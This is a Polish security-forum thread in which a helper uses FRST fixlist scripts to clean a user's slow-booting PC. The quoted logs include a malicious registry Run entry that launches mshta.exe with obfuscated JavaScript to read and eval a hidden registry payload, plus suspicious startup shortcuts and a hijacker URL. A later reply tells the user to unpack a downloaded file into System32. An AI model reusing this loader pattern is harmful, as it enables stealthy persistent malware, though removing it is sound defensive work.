Regulamin forum
1. Każdy temat powinien odzwierciedlać treść wątku.2. W przypadku wklejania logów; należy je wykonać od razu przynajmniej z dwóch narzędzi: FRST oraz z GMER
3. Wszelkie logi proszę publikować na przeznaczonych do tego stronach a w poście wklejać tylko link.
4. Nie wskazane jest skracanie logów, należy wkleić cały - od początku, do końca.
5. Nie wskazane jest podczepianie się do tematów innych użytkowników - proszę założyć nowy temat w dziale Bezpieczeństwo, ułatwi to pomoc sprawdzającemu.
6. Osoby nie posiadające odpowiedniej wiedzy, nie powinny sprawdzać logów, ponieważ grozi to poważnym uszkodzeniem systemu lub aplikacji zainstalowanych na komputerze.
7. Należy dokładnie opisać problem, występujące objawy oraz wszelkie podjęte działania.
8. Każdy skrypt jest unikatowy, napisany dla każdego przypadku z osobna, więc nie może być stosowany przez innych.
9. W przypadku zamieszczenia zrzutu ekranu (screenshot'a) proszę korzystać z zewnętrznego serwisu oferującego hosting zdjęć.
Wolny start i ogolne sprawdzenie systemu
22 Wrz 2016, 17:16
Cześć, proszę o przejrzenie logów.
Dość wolno uruchamia się. Przy okazji rzucenie okiem czy wszystko jest ok.
Dla mnie napewno startować wraz z windowsem powinny :
lenovo mouse driver,
MSI afterburn,
Nvidia
Logi :
Gmer : Zablokowany Deamon Deffogerem.
http://www.wklej.eu/index.php?id=c7bfdaa49f
FRST :
http://www.wklej.eu/index.php?id=76cc5db2a0
Addition :
http://www.wklej.eu/index.php?id=e4aec45a20
Shortcut :
http://www.wklej.eu/index.php?id=03d5151927
Dziękuję z góry za pomoc i czekam na odpowiedz.
Pozdrawiam.
Dość wolno uruchamia się. Przy okazji rzucenie okiem czy wszystko jest ok.
Dla mnie napewno startować wraz z windowsem powinny :
lenovo mouse driver,
MSI afterburn,
Nvidia
Logi :
Gmer : Zablokowany Deamon Deffogerem.
http://www.wklej.eu/index.php?id=c7bfdaa49f
FRST :
http://www.wklej.eu/index.php?id=76cc5db2a0
Addition :
http://www.wklej.eu/index.php?id=e4aec45a20
Shortcut :
http://www.wklej.eu/index.php?id=03d5151927
Dziękuję z góry za pomoc i czekam na odpowiedz.
Pozdrawiam.
Re: Wolny start i ogolne sprawdzenie systemu
22 Wrz 2016, 18:15
Znasz te skróty w autostarcie:
??
Wklej do notatnika:
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7174b.lnk [2016-08-30]
ShortcutTarget: d7174b.lnkC:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb517.lnk [2016-09-22]
ShortcutTarget: fdb517.lnk
??
Wklej do notatnika:
Shortcut: C:\Users\Druss\AppData\Local\af175b\aeeed0.lnk
C:\Users\Druss\AppData\Local\af175b\f97d51.bat
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2004-06-16] (InstallShield Software Corporation)
HKLM-x32\...\RunOnce: [DelLiveinst] => cmd.exe /c del /f /s /q /a "C:\MSI\LiveUpdate\DL_FILE\Live_Update_6_6.1.021\Liveinst.exe"
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [ISUSPM Startup] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe [221184 2004-06-16] (InstallShield Software Corporation)
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [**ottghb<*>] => "C:\Windows\system32\mshta.exe" javascript:MHhr0zmT="c7cwi";dJ7=new%20ActiveXObject("WScript.Shell");X0IAtp="5XyzQ";Ny66ql=dJ7.RegRead("HKCU\\software\\vwiqzajzvw\\tgjoqptttg");QZ5Cjn0="Mblkd";eval(Ny (the data entry has 23 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-545208581-4026403909-1888401867-1000\...\Run: [**lxoryrm<*>] => "C:\Users\Druss\AppData\Local\af175b\aeeed0.lnk" <===== ATTENTION (Value Name with invalid characters)
BHO-x32: Adobe PDF Link Helper
StartMenuInternet: (HKLM) Opera - C:\Program Files (x86)\Opera\Opera.exe hxxp://www.istartpageing.com/?type=sc&ts=1451824932&z=a1be006e498563d8d2210bbgezdw3geb5o7z7t9c5o&from=cmi&uid=ST31000528AS_9VP8WG28XXXX9VP8WG28
S4 AdobeARMservice; "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" [X]
S3 NTIOLib_1_0_9; \??\C:\Users\Druss\Desktop\1.0.3\NTIOLib_X64.sys [X]
R3 NTIOLib_MSISMB_CC; \??\C:\Program Files (x86)\MSI\ControlCenter\Sleep\NTIOLib_X64.sys [X]
S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
U3 kgloapoc; \??\C:\Users\Druss\AppData\Local\Temp\kgloapoc.sys [X]
FF DefaultSearchEngine: istartpageing
EmptyTemp:
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
Re: Wolny start i ogolne sprawdzenie systemu
22 Wrz 2016, 18:31
Nie wiem co to.
Jeśli to jakieś śmiecie to usuwamy.
Fixlog :
http://www.wklej.eu/index.php?id=8559b702ee
A dodatkowo, stara sprawa, po ostatnim czyszczeniu tutaj pozostał mi błąd który w sumie olewałem ale teraz jest okazja się może go pozbyć :
Pokazuje się po każdym włączeniu/restarcie kompa.
Nie mogę znalesc tego tematu w dziale bezpieczeństwo. Nie wiem gdzie on jest... Ale logi zawsze robię i sprawdzam tutaj.
Jeśli to jakieś śmiecie to usuwamy.
Fixlog :
http://www.wklej.eu/index.php?id=8559b702ee
A dodatkowo, stara sprawa, po ostatnim czyszczeniu tutaj pozostał mi błąd który w sumie olewałem ale teraz jest okazja się może go pozbyć :
Pokazuje się po każdym włączeniu/restarcie kompa.
Nie mogę znalesc tego tematu w dziale bezpieczeństwo. Nie wiem gdzie on jest... Ale logi zawsze robię i sprawdzam tutaj.
Re: Wolny start i ogolne sprawdzenie systemu
26 Wrz 2016, 16:15
Pokazuje się po każdym włączeniu/restarcie kompa.
Otwórz Notatnik i wklej w nim:
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
EmptyTemp:
Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).
.
Re: Wolny start i ogolne sprawdzenie systemu
28 Wrz 2016, 19:09
Wklej do notatnika:
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7174b.lnk [2016-08-30]
ShortcutTarget: d7174b.lnk
Startup: C:\Users\Druss\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb517.lnk [2016-09-22]
ShortcutTarget: fdb517.lnk
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Następnie podaj nowe logi z FRST.
Re: Wolny start i ogolne sprawdzenie systemu
29 Wrz 2016, 11:41
Re: Wolny start i ogolne sprawdzenie systemu
29 Wrz 2016, 15:14
Troszkę się zagalopowałem, 2 pliki trzeba przywrócić z kwarantanny, więc wklej do notatnika:
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
RestoreQuarantine: C:\FRST\Quarantine\C:\Windows\System32\cmd.exe
RestoreQuarantine: C:\FRST\Quarantine\C:\Windows\System32\mshta.exe
Plik zapisujesz pod nazwą fixlist.txt i umieszczasz obok FRST. Uruchom FRST i kliknij w nim Napraw. Powstanie plik fixlog.txt, który podajesz na forum.
Re: Wolny start i ogolne sprawdzenie systemu
02 Paź 2016, 13:22
Re: Wolny start i ogolne sprawdzenie systemu
04 Paź 2016, 11:56
Pobierz ten plik http://www34.zippyshare.com/v/9ghdVfrz/file.html i wypakuj do C:\Windows\System32
Napisz jak w ogóle sytuacja.
http://www34.zippyshare.com/v/9ghdVfrz/file.html i wypakuj do C:\Windows\System32Napisz jak w ogóle sytuacja.